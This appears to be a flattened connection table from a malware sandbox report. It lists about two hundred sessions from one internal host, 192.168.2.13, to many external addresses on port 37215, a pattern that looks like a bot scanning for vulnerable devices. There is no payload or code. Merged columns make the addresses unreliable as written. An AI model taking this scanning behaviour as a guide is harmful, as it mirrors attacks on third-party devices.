                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16201192.168.2.134937441.90.152.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16202192.168.2.134713041.7.19.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16203192.168.2.1352562157.38.48.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16204192.168.2.135214041.126.88.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16205192.168.2.1346480157.160.165.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16206192.168.2.135796241.247.83.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16207192.168.2.1353914157.8.192.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16208192.168.2.133900641.241.57.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16209192.168.2.134201641.80.245.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16210192.168.2.135810641.53.40.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16211192.168.2.135516441.126.71.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16212192.168.2.135279841.198.254.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16213192.168.2.1347604183.42.168.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16214192.168.2.1341732157.55.223.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16215192.168.2.135582041.160.254.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16216192.168.2.135846241.225.130.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16217192.168.2.1348192197.51.9.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16218192.168.2.1345538197.6.188.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16219192.168.2.1347674157.18.181.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16220192.168.2.134751441.104.139.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16221192.168.2.1346456157.23.145.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16222192.168.2.134063824.225.176.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16223192.168.2.135668241.233.106.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16224192.168.2.134277841.53.156.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16225192.168.2.1350746197.171.245.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16226192.168.2.133459072.191.241.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16227192.168.2.1352392222.57.208.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16228192.168.2.134543441.231.153.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16229192.168.2.1356350157.116.91.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16230192.168.2.1357712140.103.239.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16231192.168.2.1355584157.58.132.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16232192.168.2.135898841.204.162.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16233192.168.2.135116495.14.251.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16234192.168.2.1342330157.254.154.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16235192.168.2.1338304157.187.158.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16236192.168.2.135418873.190.1.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16237192.168.2.1343152157.57.214.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16238192.168.2.1333530157.171.160.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16239192.168.2.1340902146.103.152.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16240192.168.2.1359366197.253.175.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16241192.168.2.1358760197.112.7.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16242192.168.2.1352456197.127.163.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16243192.168.2.1358724108.204.218.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16244192.168.2.1353936157.55.127.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16245192.168.2.1335876197.127.38.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16246192.168.2.1347470157.122.208.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16247192.168.2.135320413.51.94.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16248192.168.2.1342768197.246.255.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16249192.168.2.135709041.249.33.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16250192.168.2.135204086.183.132.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16251192.168.2.1338818157.94.174.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16252192.168.2.1351026197.53.98.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16253192.168.2.135674241.36.65.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16254192.168.2.134692441.216.166.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16255192.168.2.134815641.171.71.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16256192.168.2.1341244157.96.232.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16257192.168.2.1336154157.195.24.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16258192.168.2.133446841.168.108.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16259192.168.2.1348962135.87.99.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16260192.168.2.1344580197.209.106.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16261192.168.2.1349134146.7.236.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16262192.168.2.133586041.43.125.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16263192.168.2.1342312197.40.47.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16264192.168.2.1358368197.195.8.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16265192.168.2.1359048157.161.195.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16266192.168.2.1351800183.113.27.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16267192.168.2.1349684197.43.26.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16268192.168.2.1348076157.64.85.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16269192.168.2.135240441.166.60.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16270192.168.2.133381641.226.132.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16271192.168.2.135152041.102.36.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16272192.168.2.1338570197.107.124.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16273192.168.2.1343376157.150.222.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16274192.168.2.13443545.249.41.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16275192.168.2.1360408157.199.53.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16276192.168.2.133480841.62.156.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16277192.168.2.1352540100.136.221.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16278192.168.2.135170041.31.64.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16279192.168.2.1355992157.131.75.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16280192.168.2.1347292157.75.36.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16281192.168.2.1340786197.199.85.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16282192.168.2.1351162177.124.145.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16283192.168.2.133845641.45.83.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16284192.168.2.1338072157.229.161.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16285192.168.2.1343252157.130.112.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16286192.168.2.1350932137.250.230.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16287192.168.2.1343114157.82.52.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16288192.168.2.134866041.99.17.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16289192.168.2.1345268197.183.227.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16290192.168.2.1357540157.55.202.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16291192.168.2.1359940157.15.87.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16292192.168.2.134349841.90.29.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16293192.168.2.1354630157.220.250.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16294192.168.2.1332818157.153.74.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16295192.168.2.1340404157.194.74.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16296192.168.2.1352422197.199.228.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16297192.168.2.133414241.19.86.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16298192.168.2.1360366206.95.239.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16299192.168.2.1349050157.114.116.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16300192.168.2.1356094197.43.226.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16301192.168.2.1333268105.233.36.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16302192.168.2.134381641.33.33.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16303192.168.2.1348160157.174.165.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16304192.168.2.1347904197.143.143.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16305192.168.2.1345744157.238.124.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16306192.168.2.1353898157.175.137.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16307192.168.2.1355136157.14.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16308192.168.2.133789641.159.111.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16309192.168.2.1349140197.108.221.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16310192.168.2.134293041.36.189.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16311192.168.2.1352096197.3.242.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16312192.168.2.1342894197.63.173.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16313192.168.2.135812241.82.139.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16314192.168.2.133490047.238.79.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16315192.168.2.1350254197.104.151.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16316192.168.2.1357278139.40.17.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16317192.168.2.134584441.31.70.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16318192.168.2.134023841.84.32.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16319192.168.2.1339068185.101.204.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16320192.168.2.1351282197.134.73.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16321192.168.2.1339596157.79.58.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16322192.168.2.1350104147.63.171.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16323192.168.2.1351820111.82.127.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16324192.168.2.133583245.236.60.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16325192.168.2.133461841.203.195.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16326192.168.2.1358358180.189.81.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16327192.168.2.1358110197.248.154.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16328192.168.2.1354524197.20.15.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16329192.168.2.134653841.1.237.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16330192.168.2.1336176197.34.247.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16331192.168.2.1357398197.193.27.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16332192.168.2.1340332136.133.190.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16333192.168.2.1335228197.241.71.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16334192.168.2.1336340128.76.138.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16335192.168.2.134126841.110.166.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16336192.168.2.1356570197.88.24.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16337192.168.2.1360924197.77.120.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16338192.168.2.1344824197.240.197.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16339192.168.2.1355188157.80.201.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16340192.168.2.134293641.231.253.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16341192.168.2.1349754197.174.83.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16342192.168.2.136075013.71.63.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16343192.168.2.1335724197.173.215.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16344192.168.2.1341718153.82.208.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16345192.168.2.1343700197.121.232.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16346192.168.2.135706041.25.184.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16347192.168.2.1352546186.248.149.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16348192.168.2.133493241.107.13.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16349192.168.2.1356486176.163.61.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16350192.168.2.1349284190.34.215.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16351192.168.2.134183473.131.120.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16352192.168.2.1351312197.128.175.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16353192.168.2.1336100197.128.0.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16354192.168.2.1343200197.12.10.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16355192.168.2.134643241.78.29.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16356192.168.2.1354094197.150.28.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16357192.168.2.1336738157.43.100.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16358192.168.2.1355580157.125.104.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16359192.168.2.134055892.36.106.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16360192.168.2.1347330113.59.141.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16361192.168.2.1358586222.92.250.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16362192.168.2.1359972197.68.68.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16363192.168.2.1354072157.97.85.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16364192.168.2.1334776157.58.195.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16365192.168.2.1360306197.68.233.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16366192.168.2.1345374157.7.51.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16367192.168.2.135410841.90.190.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16368192.168.2.1350916197.55.244.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16369192.168.2.1333484197.242.146.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16370192.168.2.1334704157.129.26.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16371192.168.2.1334336106.53.156.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16372192.168.2.1353540157.159.197.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16373192.168.2.134909841.139.42.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16374192.168.2.133787841.154.54.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16375192.168.2.133351241.78.161.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16376192.168.2.134291841.85.173.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16377192.168.2.1359952157.24.218.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16378192.168.2.1341388157.30.213.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16379192.168.2.133748441.52.49.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16380192.168.2.1353038157.107.234.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16381192.168.2.134769673.224.77.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16382192.168.2.134070041.92.214.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16383192.168.2.1338970157.134.56.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16384192.168.2.133569477.198.40.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16385192.168.2.1353614197.156.221.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16386192.168.2.1340250222.144.220.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16387192.168.2.133693441.67.254.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16388192.168.2.136078641.23.135.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16389192.168.2.1345662197.124.213.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16390192.168.2.1335958197.57.182.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16391192.168.2.1351204197.61.100.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16392192.168.2.1350288197.21.33.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16393192.168.2.135730672.37.163.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16394192.168.2.134479696.78.208.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16395192.168.2.1360262157.192.64.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16396192.168.2.134709641.73.62.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16397192.168.2.1336362201.28.175.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16398192.168.2.1358894197.203.231.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16399192.168.2.135631041.190.136.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16400192.168.2.1335862197.183.158.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16401192.168.2.1341840124.0.128.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16402192.168.2.1353096157.139.75.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16403192.168.2.1345684197.179.50.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16404192.168.2.1336664197.254.147.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16405192.168.2.1355220197.234.216.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16406192.168.2.133999841.83.52.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16407192.168.2.1348584197.133.22.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16408192.168.2.1353754157.219.28.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16409192.168.2.1342416197.83.235.7937215
                                                  TimestampBytes transferredDirectionData


